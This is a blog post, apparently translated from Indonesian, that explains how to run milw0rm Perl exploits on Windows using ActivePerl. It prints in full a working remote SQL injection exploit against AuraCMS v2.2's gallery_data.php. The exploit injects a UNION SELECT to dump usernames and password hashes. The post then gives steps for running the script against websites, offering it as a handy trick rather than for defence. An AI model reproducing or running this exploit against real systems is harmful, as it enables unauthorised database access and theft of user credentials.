Compile Exploit dengan ActivePerl

Sometimes when we browse to milw0rm we find an exploit that uses perl. But we are confused how to use these exploits on Windows machines. To resolve your confusion, I will try to share information on how to use these exploits. To use these exploits we need a software called ActivePerl, please search on google to get it. Looks like there is on the CD-yogyafree software.
Okay after you install ActivePerl and then his next step is to look for exploits that we use. As an example we use this exploit:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor…..: http://www.auracms.org
# [!] Detected…: 19.01.2008
# [!] Reported…: 25.01.2008
# [!] Response…: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug……..: $_GET[‘albums’] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case ‘detail’:
# 174: if (isset($_GET[‘id’])){
# 175: $id = $_GET[‘id’];
# 176: $albums = $_GET[‘albums’];
#
# 200: $query = mysql_query (“SELECT * FROM `mod_gallery` WHERE `kid` = ‘$albums’ $SQL_SORT LIMIT $image,$limitimage”);
#
# [!] Solution…: Install gallery update!
#

if(!$ARGV[1])
{
print “\n \\#’#/ “;
print “\n (-.-) “;
print “\n ———————oOO—(_)—OOo——————–“;
print “\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |”;
print “\n | (works only with magic quotes = off) |”;
print “\n | coded by DNX |”;
print “\n ——————————————————–“;
print “\n[!] Usage……: perl aura.pl [Host] [Path] “;
print “\n[!] Example….: perl aura.pl 127.0.0.1 /auracms/”;
print “\n[!] Options….:”;
print “\n -p [ip:port] Proxy support”;
print “\n”;
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, “p=s”);

print “[!] Exploiting…\n”;

exploit();

print “\n[!] Exploit done\n”;

sub exploit
{
my $url1 = “http://”.$host.$path.”index.php?pilih=gallery&mod=yes”;
my $url2 = “http://”.$host.$path.”mod/gallery/ajax/gallery_data.php”;
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
my $regexp = “:\”(.*?)\”,\”name\”(.*)([a-fA-F0-9]{32})”;
my $res = “”;

if($options{“p”})
{
$ua->proxy(‘http’, “http://”.$options{“p”});
}

###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die(“[!] Failed, file not found\n”);
}

##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);

######################
# check magic quotes #
######################
$url2 .= “?action=detail&id=&image=&albums='”;
$res = $ua->get($url2);
$content = $res->content;

if($content =~ /,\”albums\”:\[\”\\\\’\”],/)
{
die(“[!] Failed, magic quotes on\n”)
}

##############
# get hashes #
##############
$url2 .= “%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*”;
$res = $ua->get($url2);
$content = $res->content;

my @cont = split(/{\”files\”/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print “$1 $3\n”;
}
}
}

# milw0rm.com [2008-02-12]

Exploit is an exploit that can be used to attack websites that use the v2.2 AuraCMS exploiting weaknesses in gallery_data.php file allowing an attacker to Remote SQL Injection attacks.
Then to use these exploits, after we install ActivePerl next step is to exploit the above coffee paste into notepad and save it with extension aura_gallerydata.pl. Then to run it fairly open a Command Prompt and go into the directory where the files are stored, and then typing perl aura_gallerydata.pl then exploits can be run well. Here I give screenshoot use of these exploits.
Listen
Read phonetically


So a simple trick from me, hopefully this trick can be useful for all my friends ..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s